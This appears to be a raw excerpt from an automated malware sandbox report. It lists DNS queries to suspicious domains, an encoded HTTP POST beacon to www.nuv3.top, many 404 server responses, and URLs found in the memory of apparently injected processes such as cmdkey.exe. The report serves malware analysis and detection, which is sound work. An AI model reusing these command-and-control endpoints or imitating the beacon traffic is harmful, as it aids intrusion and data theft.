            Source: global traffic | DNS traffic detected: DNS query: www.bashei.top
            Source: global traffic | DNS traffic detected: DNS query: www.tigre777gg.online
            Source: global traffic | DNS traffic detected: DNS query: www.maya24.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.hiretemp.net
            Source: global traffic | DNS traffic detected: DNS query: www.justlivn.net
            Source: global traffic | DNS traffic detected: DNS query: www.hemistryb.online
            Source: global traffic | DNS traffic detected: DNS query: www.jeandreo.store
            Source: global traffic | DNS traffic detected: DNS query: www.zimra.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.legitima.legal
            Source: global traffic | DNS traffic detected: DNS query: www.autochemtools.com
            Source: global traffic | DNS traffic detected: DNS query: www.thewhitediamond.org
            Source: global traffic | DNS traffic detected: DNS query: www.personal-loans-jp8.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.loveinpoeipet07.site
            Source: global traffic | DNS traffic detected: DNS query: www.chinaen.org
            Source: unknownHTTP traffic detected: POST /7f48/ HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.nuv3.topOrigin: http://www.nuv3.topCache-Control: max-age=0Content-Length: 219Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.nuv3.top/7f48/User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 58 76 68 50 36 4c 3d 56 39 39 64 45 67 32 48 5a 6f 63 47 38 56 6b 44 6d 43 4d 39 79 77 63 47 45 61 64 79 59 4f 47 44 4b 77 6a 43 74 46 4f 6c 6c 4a 4b 4c 30 7a 4c 46 4e 2b 77 76 35 73 37 75 45 31 32 62 44 73 6e 73 75 75 77 32 46 61 57 53 6e 75 6e 35 6f 39 53 77 74 64 38 59 67 6e 5a 34 55 6f 6b 6b 67 68 33 46 33 43 5a 61 6a 41 4c 37 79 55 44 45 31 58 62 34 6e 64 48 30 30 78 67 57 75 51 66 59 2f 67 6d 72 76 79 4f 31 52 45 35 57 75 5a 32 54 6f 44 36 59 49 32 4b 6b 7a 39 79 72 41 64 59 75 51 2b 48 57 4f 7a 6f 4c 32 6f 74 35 2b 71 4b 65 79 4f 53 63 46 6f 4c 2f 33 71 74 68 78 50 64 63 7a 33 46 58 31 6d 51 74 41 33 64 6d 6c 43 37 41 69 63 6f 34 78 41 3d 3d Data Ascii: XvhP6L=V99dEg2HZocG8VkDmCM9ywcGEadyYOGDKwjCtFOllJKL0zLFN+wv5s7uE12bDsnsuuw2FaWSnun5o9Swtd8YgnZ4Uokkgh3F3CZajAL7yUDE1Xb4ndH00xgWuQfY/gmrvyO1RE5WuZ2ToD6YI2Kkz9yrAdYuQ+HWOzoL2ot5+qKeyOScFoL/3qthxPdcz3FX1mQtA3dmlC7Aico4xA==
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 11 Sep 2024 20:54:47 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4adce-94"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Wed, 11 Sep 2024 20:55:04 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Wed, 11 Sep 2024 20:55:06 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache date: Wed, 11 Sep 2024 20:55:09 GMT server: LiteSpeed content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html cache-control: private, no-cache, max-age=0 pragma: no-cache content-length: 1249 date: Wed, 11 Sep 2024 20:55:11 GMT server: LiteSpeed connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 11 Sep 2024 20:55:44 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 11 Sep 2024 20:55:47 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Wed, 11 Sep 2024 20:55:49 GMT server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 11 Sep 2024 20:56:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=595 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B8Bx%2FvD%2BD58gbtVfOPIMqiEsPHnxZn9TZSuLJMW7WKUSODGh77EZCfzQwAxgE6FG1o5jy1s7F0cipLj57WwOs1xY9aTRjHVMqJ6loSs3Dc96mbQwxlMn5IlyE4Ap4loFYyp0aAALw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c1a9077a8e942fe-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 11 Sep 2024 20:56:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=894 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2FPYBh6H0Q5SOHN0EnsLhWcpHP1V7JQPSZ9nLMbTaX95j%2FZO8FtAMnGCUvxDIuh1QOPtQ4CxNV9IYoJZLyrkU%2FY9etjyR8ElIVYf2lZ17RjSioac8BA7iksPiztKtd2pHaRaaGc%2BDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c1a9087cb3c7d0b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 11 Sep 2024 20:56:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=866 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcmG%2BstF6QGZ3oibJ9DO34QDsAYaexsuimzHvXyKGaxujZHsa84k92L54bVeYZc%2FHvuRSlXSbKLUXGlfbRYz9G%2BBfBAnZ386APMZYl%2BL4qmoArx%2F1BhPTfVbFzbnOM9WEQB%2FDN3zaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c1a90978c0d72a7-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 11 Sep 2024 20:56:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=823 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCZ9v4TUbt7AbR44Bt%2BkbYCYMDuKjeZjJUhkrraEHezn7XGRcKR34nlimyoDOQejofREhwW%2BfnAkRJwRG0eB74D61rB0rvT9omMliDCl2sFvXmNAbbHPhGKp1WH3HxuiZbeQMe3yrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c1a90a77df442ca-EWR alt-svc: h3=":443"; ma=86400
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 11 Sep 2024 20:56:39 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 11 Sep 2024 20:56:42 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 11 Sep 2024 20:56:44 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Wed, 11 Sep 2024 20:56:47 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "663a05b6-e42"
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:56:52 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:56:55 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:56:57 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:57:00 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:58:08 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Product: Z-BlogPHP 1.7.3 | X-XSS-Protection: 1; mode=block | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92Wdj3XRE%2FjkwsrG8whjbWBvclKY%2F6cMHWO4wsK7IOi5sFSz8YR6U%2B%2Bri1oOVawtrw8eQTWIwmxvDt8HgrsPp%2BiN6bYGPBq8OPU4ipWy9bl4WlKZBAUcVsKTZzsXRjNRyAk%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8c1a92f79a2d43d4-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:58:11 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Product: Z-BlogPHP 1.7.3 | X-XSS-Protection: 1; mode=block | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXiRVfftg3JAv89xk2bLNujjfrQWM6Fe4os0VnvQBLCJl2T5c9acTASNmX%2Bu%2BbuRPN3SsHg52SFUreAEXYpUhmg9F%2FDIYZzJgWMCzBQMrt0PhwYtybKBx8mSqeBBY9VXTyI%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8c1a93078f7043fd-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:58:13 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Product: Z-BlogPHP 1.7.3 | X-XSS-Protection: 1; mode=block | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqKl6BrJbH3ukjPgXID845WlmgfA8QHky%2BniyN6OVDriwlMOBAATDG08YYh4h7DiVlFWlr%2FQ1UNt9HSxEXoH3Cnz7eyA8k1UkmMR2yfc7pAF1mHGQvs7PO2ZDRBgVmfBtAM%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8c1a93174b44c41d-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 11 Sep 2024 20:58:16 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Product: Z-BlogPHP 1.7.3 | X-XSS-Protection: 1; mode=block | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i9MJq09%2BW9Mq3wEu%2BZ5XPtM3PrdzfbBDkf7KljLDx7CACf%2FbK2qBtQN0gBP%2Fnx0UFGrIR4NChHFPl20jTqpUFuSXH3BelFUiEMDOsRst%2F95Z0e4FFvv7scI5iz7hstSCIFU%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8c1a93273997423b-EWR | alt-svc: h3=":443"; ma=86400
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 11 Sep 2024 20:58:25 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66a4adce-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | cache-control: private, no-cache, max-age=0 | pragma: no-cache | date: Wed, 11 Sep 2024 20:58:31 GMT | server: LiteSpeed | content-encoding: gzip | vary: Accept-Encoding | transfer-encoding: chunked | connection: close | Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a | Data Ascii: a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | cache-control: private, no-cache, max-age=0 | pragma: no-cache | date: Wed, 11 Sep 2024 20:58:33 GMT | server: LiteSpeed | content-encoding: gzip | vary: Accept-Encoding | transfer-encoding: chunked | connection: close | Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a | Data Ascii: a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | cache-control: private, no-cache, max-age=0 | pragma: no-cache | date: Wed, 11 Sep 2024 20:58:36 GMT | server: LiteSpeed | content-encoding: gzip | vary: Accept-Encoding | transfer-encoding: chunked | connection: close | Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a | Data Ascii: a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | cache-control: private, no-cache, max-age=0 | pragma: no-cache | content-length: 1249 | date: Wed, 11 Sep 2024 20:58:38 GMT | server: LiteSpeed | connection: close
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000004B44000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.00000000043D4000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://fedoraproject.org/
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: cmdkey.exe, 00000008.00000002.3818027240.00000000044FC000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003D8C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruh
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000004B44000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.00000000043D4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: r9856_7.exe, 00000000.00000002.1385826227.00000000030EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3819616771.0000000005844000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/195.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/196.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/197.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/198.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/199.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/200.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/201.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/202.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/203.html
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/lol/204.html
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/search.php?act=search
            Source: NhrnLLOsLetD.exe, 0000000A.00000002.3819616771.0000000005844000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/x5bi/
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/login.php
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/c_html_js_add.php
            Source: cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js
